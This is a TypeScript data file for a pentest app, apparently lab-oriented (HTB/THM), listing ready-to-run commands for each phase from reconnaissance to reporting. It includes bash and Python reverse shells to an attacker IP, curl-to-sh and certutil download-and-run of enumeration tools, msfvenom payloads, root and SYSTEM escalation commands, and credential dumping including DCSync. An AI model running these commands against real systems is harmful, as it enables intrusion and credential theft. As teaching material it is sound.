import type { Command, PhaseId } from "@/types";

/**
 * PER-PHASE COMMAND PLAYBOOK — the "what do I run right now" guide.
 * Every command is ready to run: the global Target bar fills <TARGET>,
 * <DOMAIN>, <YOUR_IP>, <WORDLIST>, and discovered <PORTS>/<USER>/<PASS>.
 * Commands are senior-picked: the common, effective ones you actually use.
 */
export interface PhasePlaybook {
  /** One line: what this phase is for. */
  intro: string;
  /** The single best first move. */
  startHere: string;
  /** Ready-to-run commands, in the order you'd typically use them. */
  commands: Command[];
  /** What's important to find/record in this phase. */
  lookFor: string[];
  /** How to decide what comes next. */
  decideNext: string;
}

export const PLAYBOOK: Record<PhaseId, PhasePlaybook> = {
  authorization: {
    intro: "Confirm you're allowed to test this, then confirm you can reach it.",
    startHere: "Verify scope in writing, then ping the target for a reachability + OS hint.",
    commands: [
      {
        id: "pb-auth-ping",
        command: "ping -c 3 <TARGET>",
        platform: "any",
        purpose: "Confirm the host is reachable and get a TTL/OS hint.",
        why: "A quick reachability check. TTL ~64 ≈ Linux, ~128 ≈ Windows. If ICMP is blocked, don't panic — scan with -Pn.",
        exampleOutput: "64 bytes from <TARGET>: icmp_seq=1 ttl=63 time=24.1 ms",
        lookFor: ["Replies at all", "TTL (64≈Linux, 128≈Windows)"],
        risk: "low",
        next: "Move to recon / scanning.",
      },
      {
        id: "pb-auth-iface",
        command: "ip a | grep tun0",
        platform: "kali",
        purpose: "Find YOUR attacking IP (VPN interface) — set it as LHOST.",
        why: "Half of 'my reverse shell/transfer didn't work' is using the wrong IP. On HTB/THM you must use the tun0 address, not your LAN IP. Put it in the Target bar's LHOST.",
        lookFor: ["Your 10.x tun0 address"],
        risk: "low",
        next: "Set LHOST in the Target bar so payloads fill correctly.",
      },
    ],
    lookFor: ["Written authorization", "In-scope IPs/domains and exclusions", "Reachability + your tun0 IP"],
    decideNext: "Scope confirmed and host reachable → start Recon (or Scanning if you already have the IP).",
  },

  recon: {
    intro: "Build a picture of names and hosts from DNS and light active recon.",
    startHere: "If you have a domain, try a zone transfer and enumerate subdomains.",
    commands: [
      {
        id: "pb-recon-dig",
        command: "dig <DOMAIN> ANY +noall +answer",
        platform: "any",
        purpose: "Pull the common DNS records for the domain.",
        why: "A/MX/NS/TXT records orient you before deeper work.",
        risk: "low",
      },
      {
        id: "pb-recon-axfr",
        command: "dig axfr @<TARGET> <DOMAIN>",
        platform: "any",
        purpose: "Attempt a full DNS zone transfer.",
        why: "If misconfigured, AXFR dumps every record — the fastest way to enumerate hosts. Try each name server.",
        lookFor: ["Full record dump", "dev/staging/internal hostnames"],
        risk: "low",
        next: "Add discovered hostnames to /etc/hosts, then scan them.",
      },
      {
        id: "pb-recon-subs",
        command: "subfinder -d <DOMAIN> -silent | httpx -silent -title -tech-detect",
        platform: "kali",
        purpose: "Passively enumerate subdomains, then probe which are live web hosts.",
        why: "Passive sources find subdomains without touching the target; httpx confirms which respond and fingerprints them.",
        lookFor: ["Live subdomains", "dev/admin/staging hosts"],
        risk: "low",
      },
      {
        id: "pb-recon-hosts",
        command: "echo '<TARGET> <DOMAIN>' | sudo tee -a /etc/hosts",
        platform: "kali",
        purpose: "Map the hostname so vhost-based sites resolve.",
        why: "Many boxes serve different content by hostname. Web enumeration often fails until the name is in /etc/hosts.",
        risk: "low",
        next: "Now web/vhost enumeration will work.",
      },
    ],
    lookFor: ["Zone-transfer success", "New subdomains/hostnames", "Mail/NS records", "AD DC signature (53+88+389)"],
    decideNext: "Have the hosts you'll test → move to Scanning.",
  },

  scanning: {
    intro: "Find every open port and identify the service behind each.",
    startHere: "Run the default scan, and in parallel start a full-port scan.",
    commands: [
      {
        id: "pb-scan-initial",
        command: "nmap -Pn -sC -sV -oA nmap_initial <TARGET>",
        platform: "any",
        purpose: "Default scripts + version detection on the top 1000 ports, saved to files.",
        why: "The sensible first scan. -Pn skips host discovery (works when ping is filtered). -oA saves all formats so you never rescan just to re-read.",
        exampleOutput:
          "PORT    STATE SERVICE VERSION\n22/tcp  open  ssh     OpenSSH 8.2p1 Ubuntu\n80/tcp  open  http    Apache httpd 2.4.41\n445/tcp open  microsoft-ds Samba smbd 4.x",
        lookFor: ["Open ports + services", "Version strings", "OS hints (Ubuntu, Samba, IIS)"],
        risk: "low",
        next: "Read every line, then deep-scan the open ports.",
      },
      {
        id: "pb-scan-all",
        command: "nmap -Pn -p- --min-rate 2000 -oA nmap_allports <TARGET>",
        platform: "any",
        purpose: "Scan ALL 65535 TCP ports quickly to catch high-port services.",
        why: "The default scan only covers the top 1000. Boxes routinely hide the key service on a high port — this catches it.",
        lookFor: ["Ports outside the top 1000"],
        risk: "low",
      },
      {
        id: "pb-scan-deep",
        command: "nmap -Pn -p <PORTS> -sC -sV -oA nmap_deep <TARGET>",
        platform: "any",
        purpose: "Deep version + script scan on just the open ports you found.",
        why: "Once you know which ports are open, spend the detailed scan only on them. <PORTS> auto-fills from the ports you recorded.",
        lookFor: ["Exact versions", "NSE script findings (titles, anonymous access)"],
        risk: "low",
      },
      {
        id: "pb-scan-udp",
        command: "sudo nmap -sU --top-ports 50 -oA nmap_udp <TARGET>",
        platform: "any",
        purpose: "Scan the most common UDP ports (SNMP, DNS, TFTP, SNMP).",
        why: "UDP services are easy to miss and sometimes hold the key. SNMP (161) with a weak community string leaks huge amounts of data.",
        lookFor: ["SNMP (161)", "DNS (53)", "Other UDP services"],
        risk: "low",
      },
    ],
    lookFor: [
      "Every open port + its service and version",
      "Groups that imply a role: 53/88/389/445 = AD Domain Controller",
      "Web ports (80/443/8080) and SMB (445) — usually the highest yield",
      "Non-standard high ports",
    ],
    decideNext:
      "Record the open ports (they auto-fill <PORTS>). Start enumerating the highest-yield service — usually web, then SMB. Use “I found something” to jump to the right workflow.",
  },

  enumeration: {
    intro: "For each open service, pull out detailed information and attack surface.",
    startHere: "Enumerate the highest-yield service first (web, then SMB). Go deep on one before spreading thin.",
    commands: [
      {
        id: "pb-enum-whatweb",
        command: "whatweb -a 3 http://<TARGET>",
        platform: "kali",
        purpose: "Fingerprint web technologies (CMS, framework, server).",
        why: "Knowing it's WordPress vs custom PHP vs Tomcat changes every subsequent check.",
        lookFor: ["CMS + version", "server-side language", "interesting plugins"],
        risk: "low",
      },
      {
        id: "pb-enum-ffuf",
        command: "ffuf -u http://<TARGET>/FUZZ -w <WORDLIST> -mc all -fc 404 -t 40",
        platform: "kali",
        purpose: "Content discovery — find unlinked directories and files.",
        why: "The homepage is marketing; the interesting stuff (admin, backups, .git, api) is unlinked. Add -e .php,.txt,.bak when you know the stack.",
        exampleOutput: "admin [301]\n.git/ [301]\nbackup.zip [200]\nlogin.php [200]",
        lookFor: [".git / .svn", "*.bak / *.zip", "admin / dev / api", "403s worth revisiting"],
        risk: "medium",
        next: ".git exposed? Dump it. Backup file? Download and read it.",
      },
      {
        id: "pb-enum-nxc",
        command: "nxc smb <TARGET>",
        platform: "kali",
        purpose: "SMB banner: OS, hostname, domain, signing status.",
        why: "One line tells you if the host is domain-joined, its exact name, and whether SMB signing is required.",
        exampleOutput: "SMB  <TARGET>  445  DC01  [*] Windows Server 2019 (name:DC01) (domain:corp.local) (signing:True)",
        lookFor: ["OS + build", "domain name", "signing True/False"],
        risk: "low",
      },
      {
        id: "pb-enum-shares",
        command: "nxc smb <TARGET> -u '' -p '' --shares",
        platform: "kali",
        purpose: "List SMB shares via a null session (no creds).",
        why: "Anonymous share access is a common quick win — READ can leak credentials, WRITE can enable payload delivery.",
        lookFor: ["Non-default shares (backups, profiles)", "READ/WRITE permissions"],
        risk: "low",
      },
      {
        id: "pb-enum-enum4linux",
        command: "enum4linux-ng -A <TARGET>",
        platform: "kali",
        purpose: "Comprehensive SMB/RPC enumeration: users, groups, shares, policy.",
        why: "Aggregates many queries — great for a user list and password policy on domain hosts.",
        lookFor: ["User list (feeds spraying/roasting)", "password policy", "domain SID"],
        risk: "low",
      },
      {
        id: "pb-enum-ftp",
        command: "nmap -Pn -p21 --script ftp-anon,ftp-syst <TARGET>",
        platform: "any",
        purpose: "Check FTP for anonymous access and grab the banner.",
        why: "Anonymous FTP can hand you files directly — source, configs, credentials.",
        lookFor: ["Anonymous login allowed", "readable/writable dirs", "daemon version"],
        risk: "low",
      },
    ],
    lookFor: [
      "Versions of every service",
      "Anonymous/default/guest access",
      "Usernames, hostnames, and shares (record every one)",
      "Exposed source (.git), backups, config files",
      "Cross-service clues — a username here unlocks a login there",
    ],
    decideNext:
      "Open the full service module for anything interesting (Services page, or “I found something”). Found a credential? Test it everywhere. Found a real weakness? Move to Vulnerability Analysis.",
  },

  vuln_analysis: {
    intro: "Turn enumerated detail into concrete, testable weaknesses. A version is a lead, not proof.",
    startHere: "Research the exact versions you found; don't trust a version match alone.",
    commands: [
      {
        id: "pb-vuln-searchsploit",
        command: "searchsploit <PRODUCT> <VERSION>",
        platform: "kali",
        purpose: "Search the offline exploit-db for known issues.",
        why: "Finds candidate exploits to RESEARCH — not to fire blindly. Confirm the version AND configuration actually match.",
        lookFor: ["Matching exploit titles", "Whether the exact version/condition applies"],
        risk: "low",
        next: "Read the exploit, confirm prerequisites, then decide.",
      },
      {
        id: "pb-vuln-nse",
        command: "nmap -Pn --script vuln -p <PORTS> <TARGET>",
        platform: "any",
        purpose: "Run nmap's vuln NSE scripts against the open ports.",
        why: "A quick, safe-ish pass for well-known issues. Treat hits as leads to validate, never as confirmed.",
        lookFor: ["VULNERABLE lines", "CVE references to research"],
        risk: "medium",
      },
      {
        id: "pb-vuln-nuclei",
        command: "nuclei -u http://<TARGET> -severity medium,high,critical",
        platform: "kali",
        purpose: "Template-based scan for known web issues and misconfigurations.",
        why: "Fast coverage of common web problems. Every finding still needs manual validation before you claim it.",
        lookFor: ["exposed panels/files", "known CVEs", "misconfigurations"],
        risk: "medium",
      },
    ],
    lookFor: [
      "Exact product + version matches (not just 'looks old')",
      "Whether the exploit's prerequisites are actually met",
      "Misconfigurations (default creds, exposed admin, weak settings)",
    ],
    decideNext: "You have a specific, plausible weakness → Validate it with the safest possible test before exploiting.",
  },

  validation: {
    intro: "Safely confirm a suspected weakness is real — the least intrusive proof.",
    startHere: "Reproduce the issue with a benign, controlled test (Burp Repeater is ideal for web).",
    commands: [
      {
        id: "pb-val-curl",
        command: "curl -sSik http://<TARGET>/<PATH>",
        platform: "any",
        purpose: "Re-request a specific endpoint to observe its exact behavior.",
        why: "Precise, repeatable requests let you change one thing at a time and see cause and effect — the core of validation.",
        lookFor: ["status/headers/body differences", "error leakage"],
        risk: "low",
      },
      {
        id: "pb-val-sqli",
        command: "sqlmap -u 'http://<TARGET>/item?id=1' --batch --level 2 --risk 1",
        platform: "kali",
        purpose: "Confirm/enumerate a SUSPECTED SQL injection conservatively.",
        why: "After manual confirmation, sqlmap validates and enumerates. Keep level/risk low; never run it blindly against production data.",
        lookFor: ["'parameter is injectable'", "DBMS + technique"],
        risk: "high",
      },
    ],
    lookFor: [
      "A reproducible proof (boolean/time difference, benign command output)",
      "Enough to demonstrate impact WITHOUT causing harm",
      "Evidence captured (request/response, output) as you go",
    ],
    decideNext: "Confirmed and reproducible → Exploitation (deliberately, within scope). Capture evidence now.",
  },

  exploitation: {
    intro: "Leverage a validated weakness to gain access — deliberately and within scope.",
    startHere: "Set up your listener FIRST, then trigger the exploit/reverse shell.",
    commands: [
      {
        id: "pb-exp-listener",
        command: "nc -lvnp 4444",
        platform: "kali",
        purpose: "Start a listener to catch a reverse shell.",
        why: "Always start the listener before firing the payload. Use a common port and your tun0 IP (LHOST).",
        lookFor: ["'connect to [...] from ...' when the shell lands"],
        risk: "medium",
      },
      {
        id: "pb-exp-revshell",
        command: "bash -c 'bash -i >& /dev/tcp/<YOUR_IP>/4444 0>&1'",
        platform: "linux",
        purpose: "A classic bash reverse shell (runs ON the target).",
        why: "The most common Linux reverse shell. Uses <YOUR_IP> = your tun0 address. If bash isn't available, try the python one-liner.",
        lookFor: ["A shell appears in your nc listener"],
        risk: "high",
        next: "Once you have the shell, stabilize it (Initial Access).",
      },
      {
        id: "pb-exp-pyshell",
        command:
          "python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"<YOUR_IP>\",4444));[os.dup2(s.fileno(),f) for f in(0,1,2)];subprocess.call([\"/bin/sh\",\"-i\"])'",
        platform: "linux",
        purpose: "Python reverse shell (runs ON the target) — fallback when bash won't cooperate.",
        why: "Widely available and reliable. Same idea: connect back to your listener.",
        risk: "high",
      },
      {
        id: "pb-exp-msfvenom",
        command: "msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<YOUR_IP> LPORT=4444 -f exe -o shell.exe",
        platform: "kali",
        purpose: "Generate a Windows reverse-shell payload.",
        why: "When you need a binary payload. Pair with a matching handler (exploit/multi/handler) in Metasploit.",
        lookFor: ["Payload written", "matching handler set up"],
        risk: "high",
      },
      {
        id: "pb-exp-msf",
        command: "msfconsole -q -x 'use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST <YOUR_IP>; set LPORT 4444; run'",
        platform: "kali",
        purpose: "Start a Metasploit handler to catch a meterpreter session.",
        why: "The handler must match the payload exactly (payload, LHOST, LPORT), or the session won't establish.",
        lookFor: ["'Meterpreter session 1 opened'"],
        risk: "high",
      },
    ],
    lookFor: ["A stable shell/session", "The user context you landed as", "Whether the payload matches the handler"],
    decideNext: "You have access → Initial Access: stabilize the shell and identify the OS before anything else.",
  },

  initial_access: {
    intro: "Establish and stabilize your foothold. Stop and get your bearings.",
    startHere: "Upgrade the shell to a proper TTY, then find out who you are and what OS this is.",
    commands: [
      {
        id: "pb-ia-pty",
        command: "python3 -c 'import pty;pty.spawn(\"/bin/bash\")'",
        platform: "linux",
        purpose: "Upgrade a dumb shell to an interactive PTY.",
        why: "A raw shell can't use tab-completion, sudo, or editors and dies on Ctrl-C. After this, press Ctrl-Z, then run: stty raw -echo; fg — then export TERM=xterm.",
        lookFor: ["A normal bash prompt", "tab-completion works"],
        risk: "low",
        next: "Identify who you are and the OS.",
      },
      {
        id: "pb-ia-whoami",
        command: "id; hostname; uname -a",
        platform: "linux",
        purpose: "Establish identity, host, and kernel (Linux).",
        why: "Group membership (docker/lxd/sudo) can itself be an escalation path. Kernel/distro scopes what's relevant.",
        lookFor: ["Interesting groups", "kernel version", "distro"],
        risk: "low",
      },
      {
        id: "pb-ia-winwhoami",
        command: "whoami /priv & whoami /groups",
        platform: "windows",
        purpose: "Establish identity and TOKEN PRIVILEGES (Windows).",
        why: "whoami /priv is the Windows equivalent of sudo -l. SeImpersonate/SeAssignPrimaryToken on a service account is often a direct path to SYSTEM.",
        lookFor: ["SeImpersonatePrivilege", "SeBackup/SeRestore/SeDebug", "privileged groups"],
        risk: "low",
      },
    ],
    lookFor: ["A stable TTY", "Your user and privileges", "The OS (Linux vs Windows) — pick the right workflow", "Whether the host is domain-joined"],
    decideNext: "Stabilized and identified → Post-Exploitation: enumerate the host from the inside.",
  },

  post_exploitation: {
    intro: "Enumerate the host from inside: identity, privileges, network, processes, credentials.",
    startHere: "Run the quick manual checks first, THEN the automated enumerator (peas) — and read its highlights critically.",
    commands: [
      {
        id: "pb-post-sudo",
        command: "sudo -l",
        platform: "linux",
        purpose: "List what you can run via sudo — the highest-yield Linux check.",
        why: "NOPASSWD entries or GTFOBins-able binaries are usually a quick win to root.",
        exampleOutput: "User www-data may run the following commands:\n    (root) NOPASSWD: /usr/bin/find",
        lookFor: ["NOPASSWD", "binaries like find/vim/python/tar (check GTFOBins)"],
        risk: "low",
      },
      {
        id: "pb-post-suid",
        command: "find / -perm -4000 -type f 2>/dev/null",
        platform: "linux",
        purpose: "List SUID binaries (run as their owner, often root).",
        why: "A non-standard SUID binary that GTFOBins can escape is a direct path to root.",
        lookFor: ["Unusual entries (python, find, nmap, custom bins in /opt)"],
        risk: "low",
      },
      {
        id: "pb-post-caps",
        command: "getcap -r / 2>/dev/null",
        platform: "linux",
        purpose: "List files with Linux capabilities.",
        why: "cap_setuid+ep on an interpreter (python/perl) is effectively root.",
        lookFor: ["cap_setuid on python/perl/ruby"],
        risk: "low",
      },
      {
        id: "pb-post-net",
        command: "ss -tulpn; ps auxww",
        platform: "linux",
        purpose: "Listening services and running processes.",
        why: "Internal-only services (bound to 127.0.0.1) and root-owned processes are common escalation and pivot leads.",
        lookFor: ["127.0.0.1-only services", "root processes", "creds in command lines"],
        risk: "low",
      },
      {
        id: "pb-post-linpeas",
        command: "curl -s http://<YOUR_IP>:8000/linpeas.sh | sh | tee linpeas.out",
        platform: "linux",
        purpose: "Run linPEAS (automated enumeration) and save the output.",
        why: "Serve it from your box (python3 -m http.server 8000) and pull it. It highlights likely vectors — read the red/yellow items, don't just scroll.",
        lookFor: ["Red/yellow highlights", "sudo/SUID/caps/cron findings", "stored credentials"],
        risk: "low",
      },
      {
        id: "pb-post-winpeas",
        command: "certutil -urlcache -f http://<YOUR_IP>:8000/winPEASx64.exe wp.exe & wp.exe",
        platform: "windows",
        purpose: "Download and run winPEAS (Windows automated enumeration).",
        why: "Surfaces token privileges, service misconfigs, AlwaysInstallElevated, and stored creds. Confirm each highlight manually.",
        lookFor: ["token privileges", "modifiable services", "stored credentials"],
        risk: "low",
      },
      {
        id: "pb-post-httpserver",
        command: "python3 -m http.server 8000",
        platform: "kali",
        purpose: "Serve tools from your box so the target can pull them.",
        why: "The standard way to get linpeas/winpeas/exploits onto the target. Use your tun0 IP as <YOUR_IP>.",
        risk: "low",
      },
    ],
    lookFor: [
      "Your privileges (sudo -l / whoami /priv)",
      "SUID/capabilities/cron (Linux) — services/tasks/privileges (Windows)",
      "Credentials in files, history, configs, and the SAM/LSASS",
      "Internal services and other hosts to pivot to",
    ],
    decideNext: "Found an escalation vector → Privilege Escalation. Found credentials → test reuse everywhere.",
  },

  privilege_escalation: {
    intro: "Find a path from your current privileges to higher ones — enumerate before exploiting.",
    startHere: "Pick the single most promising vector from your enumeration and exploit it deliberately.",
    commands: [
      {
        id: "pb-priv-gtfo",
        command: "sudo find . -exec /bin/sh \\; -quit",
        platform: "linux",
        purpose: "Example GTFOBins escape when you can run find as root.",
        why: "find can execute commands; run as root it spawns a root shell. Every GTFOBins binary has its own documented escape — look yours up.",
        lookFor: ["# root prompt", "id shows uid=0"],
        risk: "high",
        next: "You're root — capture proof and record impact.",
      },
      {
        id: "pb-priv-writepasswd",
        command: "openssl passwd -1 -salt x pass123",
        platform: "linux",
        purpose: "Make a password hash to inject if /etc/passwd is writable.",
        why: "If /etc/passwd is writable, append a root-UID line with this hash to create a root login. A classic writable-file escalation.",
        risk: "high",
      },
      {
        id: "pb-priv-printspoofer",
        command: "PrintSpoofer.exe -i -c cmd",
        platform: "windows",
        purpose: "Abuse SeImpersonatePrivilege to get a SYSTEM shell.",
        why: "The go-to escalation when whoami /priv shows SeImpersonate on a service account. More reliable than a kernel exploit.",
        lookFor: ["nt authority\\system prompt"],
        risk: "high",
      },
      {
        id: "pb-priv-secretsdump",
        command: "impacket-secretsdump -sam sam.save -system system.save LOCAL",
        platform: "kali",
        purpose: "Extract local NTLM hashes from saved SAM/SYSTEM hives.",
        why: "Once SYSTEM (or with SeBackup), dump local hashes for pass-the-hash and reuse across the network.",
        lookFor: ["Administrator NTLM hash", "reusable local admin"],
        risk: "high",
      },
    ],
    lookFor: [
      "Which vector actually works (sudo/SUID/cron/caps, or service/token/AlwaysInstallElevated)",
      "Proof of higher privilege (id=0 / nt authority\\system)",
      "Credentials/hashes recovered along the way",
    ],
    decideNext: "Highest privileges reached → Impact and credential reuse (lateral movement). On a domain, pivot to the AD workflow.",
  },

  impact: {
    intro: "Demonstrate real impact conservatively and capture evidence — prove risk, don't cause harm.",
    startHere: "Capture proof of your access, then assess how far it reaches (reuse, lateral movement).",
    commands: [
      {
        id: "pb-impact-proof",
        command: "hostname && id && cat /root/root.txt 2>/dev/null",
        platform: "linux",
        purpose: "Capture proof of privileged access (Linux).",
        why: "Screenshot/record the context (who + where) as evidence. On labs, the root flag is proof; on real engagements, a minimal read-only proof.",
        risk: "low",
      },
      {
        id: "pb-impact-reuse",
        command: "nxc smb <TARGET>/24 -u <USER> -p <PASS> --continue-on-success",
        platform: "kali",
        purpose: "Test a recovered credential across the subnet (lateral movement).",
        why: "Reuse is how one host becomes the whole network. A local admin hash/password often unlocks many machines.",
        lookFor: ["[+] valid on other hosts", "(Pwn3d!) = admin elsewhere"],
        risk: "high",
      },
      {
        id: "pb-impact-dcsync",
        command: "impacket-secretsdump '<DOMAIN>/<USER>:<PASS>@<TARGET>' -just-dc",
        platform: "kali",
        purpose: "DCSync — pull all domain hashes (with replication rights).",
        why: "The endgame for AD: krbtgt + every account hash = full domain compromise. Handle with care and stay in scope.",
        lookFor: ["krbtgt hash", "Administrator hash"],
        risk: "critical",
      },
    ],
    lookFor: ["Concrete proof of access", "How far the access reaches", "Business impact in plain terms"],
    decideNext: "Impact demonstrated and evidenced → Cleanup, then Reporting.",
  },

  cleanup: {
    intro: "Remove everything you introduced and restore the environment — leave it as you found it.",
    startHere: "Go back through your notes and remove every file, account, and change you made.",
    commands: [
      {
        id: "pb-clean-files",
        command: "ls -la /tmp /dev/shm 2>/dev/null",
        platform: "linux",
        purpose: "Find tools/payloads you dropped in common scratch locations.",
        why: "linpeas, exploits, and shells often land in /tmp or /dev/shm. Remove them and note the removal.",
        risk: "low",
      },
      {
        id: "pb-clean-note",
        command: "# Track in your notes: files, accounts, keys, services, config changes",
        platform: "any",
        purpose: "Cleanup is a checklist, not a command — record every artifact as you create it.",
        why: "Honest, complete cleanup depends on knowing exactly what you changed. Use the Notes tab with the 'evidence'/'todo' tags.",
        risk: "low",
      },
    ],
    lookFor: ["Uploaded files removed", "Created accounts/keys removed", "Modified configs restored", "Every change documented"],
    decideNext: "Environment restored and documented → Reporting.",
  },

  reporting: {
    intro: "Turn the assessment into a clear, professional, actionable report — from what you recorded.",
    startHere: "Open the Report tab in your assessment; it assembles findings, evidence, and the timeline automatically.",
    commands: [
      {
        id: "pb-report-note",
        command: "# Use the Findings + Evidence tabs, then the Report tab (Markdown / PDF)",
        platform: "any",
        purpose: "Reporting happens in the app, not the terminal.",
        why: "Every finding needs a title, severity, evidence, reproduction, impact, and remediation. The Report is generated from exactly what you recorded — nothing invented.",
        risk: "low",
      },
    ],
    lookFor: ["Every finding has evidence", "Consistent, justified severities", "Impact in business terms", "Actionable remediation"],
    decideNext: "Report reviewed for accuracy (no over-claiming) → deliver. Retest later to confirm fixes.",
  },
};
